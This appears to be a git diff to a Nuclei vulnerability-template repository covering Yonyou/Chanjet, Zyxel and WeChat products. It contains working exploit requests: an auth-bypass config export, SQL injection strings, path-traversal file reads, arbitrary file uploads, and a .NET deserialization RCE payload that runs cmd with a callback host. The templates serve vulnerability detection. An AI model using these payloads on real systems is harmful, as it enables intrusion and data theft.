diff --git a/http/vulnerabilities/yonyou/yonyou-nc-bshservlet-full-check.yaml b/http/cnvd/2021/CNVD-2021-30167.yaml.yaml similarity index 100% rename from http/vulnerabilities/yonyou/yonyou-nc-bshservlet-full-check.yaml rename to http/cnvd/2021/CNVD-2021-30167.yaml.yaml diff --git a/http/vulnerabilities/yonyou/yonyou-nc-uapjs-jsinvoke-fileupload.yaml b/http/cnvd/2023/CNVD-C-2023-76801.yaml similarity index 100% rename from http/vulnerabilities/yonyou/yonyou-nc-uapjs-jsinvoke-fileupload.yaml rename to http/cnvd/2023/CNVD-C-2023-76801.yaml diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml new file mode 100644 index 0000000000..c4b5ea88a8 --- /dev/null +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -0,0 +1,33 @@ +id: CVE-2022-0342 + +info: + name: Zyxel - Authentication Bypass + author: SleepingBag945 + severity: critical + description: | + An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device. + metadata: + max-request: 1 + fofa-query: app="ZyXEL-USG-FLEX" + verified: true + tags: cve,cve2022,zyxel,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/export-cgi?category=config&arg0=startup-config.conf" + + matchers-condition: and + matchers: + - type: word + words: + - "interface-name" + + - type: word + part: header + words: + - "text/zyxel" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/wechat/wechat-info-leak.yaml b/http/vulnerabilities/wechat/wechat-info-leak.yaml index eb239576c6..360756423f 100644 --- a/http/vulnerabilities/wechat/wechat-info-leak.yaml +++ b/http/vulnerabilities/wechat/wechat-info-leak.yaml @@ -1,20 +1,24 @@ id: wechat-info-leak info: - name: wechat-info-leak + name: WeChat agentinfo - Information Exposure author: SleepingBag945 severity: high description: | - 企业微信信息泄露 + There is an information leakage vulnerability in the agentinfo interface of Tencent Enterprise WeChat. An attacker can obtain the Enterprise WeChat Secret through the vulnerability. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/f7869eb69bad66d177a88df4cebfe584691651ce/%E5%85%B6%E4%BB%96%E6%BC%8F%E6%B4%9E/%E8%85%BE%E8%AE%AF%20%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%20agentinfo%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md metadata: - tags: wechat + max-request: 1 + fofa-query: body="wework_admin.normal_layout" + verified: true + tags: wechat,exposure,tencent http: - raw: - | GET /cgi-bin/gateway/agentinfo HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Content-Type: application/x-www-form-urlencoded matchers: @@ -22,4 +26,4 @@ http: dsl: - status_code_1 == 200 && contains(body_1,"errcode") && contains(body_1,"strcorpid") - contains(body_1,"corpid") - condition: and + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-chanjet-remote-gnfunction-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml similarity index 50% rename from http/vulnerabilities/yonyou/yonyou-chanjet-remote-gnfunction-sqli.yaml rename to http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml index 1d190ef477..3b30482133 100755 --- a/http/vulnerabilities/yonyou/yonyou-chanjet-remote-gnfunction-sqli.yaml +++ b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml @@ -1,18 +1,24 @@ -id: yonyou-chanjet-remote-gnfunction-sqli +id: chanjet-gnremote-sqli info: - name: 畅捷通远程通 GNRemote.dll SQL注入漏洞 + name: Changjietong Remote Communication GNRemote.dll - SQL Injection author: SleepingBag945 severity: high - description: 畅捷通信息技术股份有限公司是一家致力于为中国小微企业提供以财务及管理服务为核心的平台服务、应用服务、数据增值服务。 畅捷通信息技术股份有限公司畅捷通存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。 - tags: yonyou,changjietong + description: | + Changjietong Information Technology Co., Ltd. is a company dedicated to providing platform services, application services, and data value-added services with financial and management services as its core to China's small and micro enterprises. Changjietong Information Technology Co., Ltd. Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database. + reference: | + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 2 + fofa-query: body="远程通CHANJET_Remote" + verified: true + tags: yonyou,chanjet,sqli http: - raw: - | POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1 Host: {{Hostname}} - Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip @@ -21,32 +27,25 @@ http: - | POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1 Host: {{Hostname}} - Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip username=%22'%20or%201%3d2%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1 - - matchers-condition: and matchers: - type: word + part: body_1 words: - "{\"RetCode\":0}" - part: body_1 condition: and - type: word + part: body_2 words: - "{\"RetCode\":2}" - part: body_2 condition: and - type: status status: - - 200 - - - -# http://wiki.peiqi.tech/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml index c5dcb41470..f3844303d8 100755 --- a/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml +++ b/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml @@ -1,13 +1,17 @@ id: chanjet-tplus-checkmutex-sqli info: - name: chanjettplus - CheckMutex SQL Injection + name: Chanjet Tplus CheckMutex - SQL Injection author: unknown - severity: critical + severity: high description: | There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou. reference: - - https://stack.chaitin.com/vuldb/detail?id=f4ae9a80-58c7-4a5c-a463-ae4e40605880 + - https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%94%A8%E5%8F%8B%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="畅捷通-TPlus" + verified: true tags: chanjettplus,sqli http: @@ -19,8 +23,13 @@ http: Cookie: ASP.NET_SessionId=; sid=admin {"accNum": "6'", "functionTag": "SYS0104", "url": ""} + matchers: - type: word + part: body words: - - "附近有语法错误" - part: body \ No newline at end of file + - "order by begintime" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml new file mode 100755 index 0000000000..71089b0995 --- /dev/null +++ b/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml @@ -0,0 +1,33 @@ +id: chanjet-tplus-file-read + +info: + name: Chanjet TPlus DownloadProxy.aspx - Arbitrary File Read + author: SleepingBag945 + severity: high + description: | + Chanjet TPlus DownloadProxy.aspx file has an arbitrary file reading vulnerability. An attacker can obtain sensitive files on the server through the vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20DownloadProxy.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="畅捷通-TPlus" + verified: true + tags: yonyou,chanjet,lfi,tplus + +http: + - method: GET + path: + - "{{BaseURL}}/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "xml version" + - "" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml new file mode 100755 index 0000000000..899a90ef99 --- /dev/null +++ b/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml @@ -0,0 +1,43 @@ +id: chanjet-tplus-fileupload + +info: + name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload + author: SleepingBag945 + severity: critical + description: | + There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20Upload.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 2 + fofa-query: app="畅捷通-TPlus" + verified: true + tags: yonyou,chanjet,upload,intrusive + +http: + - raw: + - | + POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuirnbcvo + Accept-Encoding: gzip + + ------WebKitFormBoundaryuirnbcvo + Content-Disposition: form-data; name="File1"; filename="../../../img/login/{{randstr_1}}.jpg" + Content-Type: image/jpeg + + {{randstr_2}} + ------WebKitFormBoundaryuirnbcvo-- + + - | + GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1==200 && status_code_2==200" + - "contains(body_2, '{{randstr_2}}')" + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-getstorewarehousebystore_rce.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-getstorewarehousebystore_rce.yaml deleted file mode 100644 index 84fa88c270..0000000000 --- a/http/vulnerabilities/yonyou/chanjet-tplus-getstorewarehousebystore_rce.yaml +++ /dev/null @@ -1,67 +0,0 @@ -id: chanjet-tplus-getstorewarehousebystore_rce - -info: - name: 用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞 - author: SleepingBag945 - severity: critical - description: | - 用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞 - https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20GetStoreWarehouseByStore%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html - metadata: - tags: yonyou,chanjet - -http: - - raw: - - | - POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1 - Host: {{Hostname}} - X-Ajaxpro-Method: GetStoreWarehouseByStore - - { - "storeID":{} - } - - matchers-condition: or - matchers: - - type: word - part: body - words: - - "actorId或archivesId不能为空" - - "\"Type\":\"System.ArgumentException\"" - condition: and - - - type: word - part: body - words: - - "Object reference not set to an instance of an object" - - "System.NullReferenceException" - condition: and - - - - - - -# EXP -# POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1 -# Host: -# User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F -# Connection: close -# Content-Length: 668 -# X-Ajaxpro-Method: GetStoreWarehouseByStore -# Accept-Encoding: gzip - -# { -# "storeID":{ -# "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35", -# "MethodName":"Start", -# "ObjectInstance":{ -# "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", -# "StartInfo":{ -# "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", -# "FileName":"cmd", -# "Arguments":"/c whoami > C:/Progra~2/Chanjet/TPlusStd/WebSite/2RUsL6jgx9sGX4GItQBcVfxarBM.txt" -# } -# } -# } -# } diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml new file mode 100644 index 0000000000..fef9baf76a --- /dev/null +++ b/http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml @@ -0,0 +1,53 @@ +id: chanjet-tplus-rce + +info: + name: Chanjet TPlus GetStoreWarehouseByStore - Remote Command Execution + author: SleepingBag945 + severity: critical + description: | + Changjet Tplus has a front-end remote code execution vulnerability. An attacker can use the GetStoreWarehouseByStore method to inject a serialized payload and execute arbitrary commands. This ultimately results in leakage of sensitive server information or code execution. + reference: + - https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20GetStoreWarehouseByStore%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html + - https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + metadata: + fofa-query: app="畅捷通-TPlus" + verified: true + tags: chanjettplus,rce + +http: + - raw: + - | + POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1 + Host: {{Hostname}} + X-Ajaxpro-Method: GetStoreWarehouseByStore + + { + "storeID":{ + "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35", + "MethodName":"Start", + "ObjectInstance":{ + "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", + "StartInfo":{ + "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", + "FileName":"cmd", + "Arguments":"/c ping {{interactsh-url}}" + } + } + } + } + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "actorId或archivesId不能为空" + - "\"Type\":\"System.ArgumentException\"" + - "Object reference not set to an instance of an object" + - "System.NullReferenceException" + condition: or + + - type: word + part: interactsh_protocol + words: + - "dns" \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-ufida-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml similarity index 62% rename from http/vulnerabilities/yonyou/yonyou-chanjet-tplus-ufida-sqli.yaml rename to http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml index 809e9ad420..21525c8bf3 100755 --- a/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-ufida-sqli.yaml +++ b/http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml @@ -1,24 +1,29 @@ -id: yonyou-changjietong-tplus-ufida-sqli +id: chanjet-tplus-ufida-sqli info: - name: 畅捷通 T+ Ufida.T.SM.Login.UIP SQL注入漏洞 + name: Chanjet TPluse Ufida.T.SM.Login.UIP - SQL injection author: SleepingBag945 severity: high - description: 畅捷通信息技术股份有限公司是一家致力于为中国小微企业提供以财务及管理服务为核心的平台服务、应用服务、数据增值服务。 畅捷通信息技术股份有限公司畅捷通存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。 - tags: yonyou,changjietong + description: | + Chanjet TPluse application has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database. + reference: + - https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20Plus%20%E5%AE%A1%E8%AE%A1%20%EF%BC%88%E8%B6%85%E8%AF%A6%E7%BB%86%EF%BC%89.md + metadata: + max-request: 1 + fofa-query: app="畅捷通-TPlus" + verified: true + tags: yonyou,chanjet,sqli http: - raw: - | POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1 Host: {{Hostname}} - Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip {"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""} - matchers-condition: and matchers: - type: word @@ -31,5 +36,4 @@ http: - type: status status: - - 200 - + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml similarity index 55% rename from http/vulnerabilities/yonyou/yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml rename to http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml index 756203235b..c04b608af5 100755 --- a/http/vulnerabilities/yonyou/yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml @@ -1,20 +1,24 @@ -id: yonyou-erp-u8-uploadfiledata-arbitrary-file-upload +id: grp-u8-uploadfiledata info: - name: yonyou-erp-u8-uploadfiledata-arbitrary-file-upload + name: UFIDA GRP-U8 UploadFileData - Arbitrary File Upload author: SleepingBag945 severity: critical - description: 用友U8+ERP客户关系管理软件存在文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。 + description: | + File upload vulnerability in UFIDA U8+ERP customer relationship management software. An attacker can use this vulnerability to gain control of the server. reference: - - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20UploadFileData%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html - tags: yonyou,upload + - https://mp.weixin.qq.com/s/DZXFxLC7fFKbPUWrdyITag + metadata: + max-request: 2 + fofa-query: title="用友GRP-U8行政事业内控管理软件" + verified: true + tags: yonyou,fileupload,grp,intrusive http: - raw: - | POST /UploadFileData?action=upload_file&filename=../{{randstr_1}}.jsp HTTP/1.1 - Host: 60.172.58.9:8010 - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Host: {{Hostname}} Content-Length: 327 Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqoqnjtcw @@ -34,18 +38,12 @@ http: - | GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* Accept-Encoding: gzip - req-condition: true matchers: - type: dsl dsl: - "status_code_1 == 200 && contains(body_1,'showSucceedMsg')" - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" - condition: and - - -# 可尝试启动并调用xpcmdshell执行命令 \ No newline at end of file + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-file-upload.yaml deleted file mode 100755 index ba54daed45..0000000000 --- a/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-file-upload.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: yonyou-changjietong-tplus-file-upload - -info: - name: 畅捷通 T+ 任意文件上传漏洞 - author: SleepingBag945 - severity: critical - description: 畅捷通 T+ 系列产品存在任意文件上传漏洞,攻击者可利用该漏洞上传恶意文件控制目标服务器。 - tags: yonyou,changjietong,upload - -http: - - raw: - - | - POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuirnbcvo - Accept-Encoding: gzip - - ------WebKitFormBoundaryuirnbcvo - Content-Disposition: form-data; name="File1"; filename="../../../img/login/{{randstr_1}}.jpg" - Content-Type: image/jpeg - - {{randstr_2}} - ------WebKitFormBoundaryuirnbcvo-- - - - | - GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Encoding: gzip - - matchers-condition: and - matchers: - - type: dsl - dsl: - - "status_code_1==200" - - "status_code_2==200" - - "contains(body_2, '{{randstr_2}}')" - condition: and - diff --git a/http/vulnerabilities/yonyou/yonyou-chanjie-tplus-downloadproxy-file-read.yaml b/http/vulnerabilities/yonyou/yonyou-chanjie-tplus-downloadproxy-file-read.yaml deleted file mode 100755 index 6d63bf8eae..0000000000 --- a/http/vulnerabilities/yonyou/yonyou-chanjie-tplus-downloadproxy-file-read.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: yonyou-changjietong-tplus-downloadproxy-file-read - -info: - name: 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞 - author: SleepingBag945 - severity: medium - description: 用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件 - tags: yonyou,changjietong - -http: - - raw: - - | - GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config HTTP/1.1 - Host: {{Hostname}} - - - matchers-condition: and - matchers: - - type: word - words: - - "xml version" - - "" - part: body - condition: and - - - type: status - status: - - 200 - diff --git a/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml b/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml index c6cd934f97..6c165c4cea 100755 --- a/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml +++ b/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml @@ -1,34 +1,32 @@ id: yonyou-fe-directory-traversal info: - name: yonyou-fe-directory-traversal + name: FE collaborative Office templateOfTaohong_manager.jsp - Path Traversal author: SleepingBag945 severity: medium - description: 用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞,通过漏洞攻击者可以获取目录文件等信息,导致进一步攻击 + description: | + There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UFIDA FE collaborative office platform. Through the vulnerability, attackers can obtain directory files and other information, leading to further attacks. reference: - - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html - tags: yonyou + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 2 + fofa-query: "FE协作" + verified: true + tags: yonyou,fe,lfi http: - - raw: - - | - GET /system/mediafile/templateOfTaohong_manager.jsp?path=/../../../ HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Cookie: JSESSIONID=31DB4A83640B082DBA62A54ADB04D77C - Accept-Encoding: gzip - - + - method: GET + path: + - "{{BaseURL}}/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../" matchers-condition: and matchers: - type: word words: - "window.location=\"templateOfTaohong_manager.jsp?path=\"" - - type: word - words: - "var next=window.confirm(\"确定删除文件吗?\");" + condition: and + - type: status status: - 200 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-accept-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml similarity index 67% rename from http/vulnerabilities/yonyou/yonyou-nc-accept-arbitrary-file-upload.yaml rename to http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml index 07994cca95..6c272f87c7 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-accept-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml @@ -1,20 +1,25 @@ -id: yonyou-nc-accept-arbitrary-file-upload +id: yonyou-nc-accept-fileupload info: - name: yonyou-nc-accept-arbitrary-file-upload + name: YonYou NC Accept Upload - Arbitray File Upload author: SleepingBag945 severity: critical - description: 用友NC在accept.jsp文件处存在任意文件上传漏洞。 + description: | + Arbitrary file upload vulnerability in UFIDA N C accept.jsp . An attacker can obtain website permissions through the vulnerability. reference: - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html - tags: yonyou + - https://mp.weixin.qq.com/s?__biz=MzkyMTMwNjU1Mg==&chksm=c184c6a1f6f34fb788437557f0e7708c74b16928e5973772db09b12067f10cf28b108701f67a&idx=1&lang=zh_CN&mid=2247488118&sn=16217c422eafc656df5fcacee9aa2153&token=857848930#rd + metadata: + max-request: 2 + fofa-query: icon_hash="1085941792" + verified: true + tags: yonyou,nc,intrusive,fileupload http: - raw: - | POST /aim/equipmap/accept.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: */* Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567 Accept-Encoding: gzip @@ -33,20 +38,13 @@ http: - | GET /{{randstr_3}}.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip - req-condition: true matchers: - type: dsl dsl: - "status_code_1 == 200" - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" - condition: and - - - -# 可尝试启动并调用xpcmdshell执行命令 \ No newline at end of file + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-uploadservlet-deserialization-rce.yaml b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml similarity index 66% rename from http/vulnerabilities/yonyou/yonyou-nc-baseapp-uploadservlet-deserialization-rce.yaml rename to http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml index 0a9270d27f..35cd23cd7d 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-uploadservlet-deserialization-rce.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml @@ -1,22 +1,26 @@ -id: yonyou-nc-baseapp-uploadservlet-deserialization-rce +id: yonyou-nc-baseapp-deserialization info: - name: Yonyou NC BaseApp UploadServlet Deserialization RCE + name: Yonyou NC BaseApp UploadServlet - Deserialization Detect author: SleepingBag945 - severity: critical + severity: high description: | Yonyou NC is an enterprise-level management software, widely used in large and medium-sized enterprises.Realize modeling, development, inheritance, operation, management integration of IT solution information platform.UFIDA NC for C/S architecture, the use of Java programming language development, the client can directly use UClient, the server interface for HTTP.A page of UFIDA NC6.5, there is arbitrary file upload vulnerability.The cause of vulnerability is that there is no type restriction at the uploading file, and an attacker without authentication can take advantage of this vulnerability by sending special data packets to the target system, and a remote attacker who successfully takes advantage of this vulnerability can upload any file to the target system to execute commands. - tags: rce + reference: + - 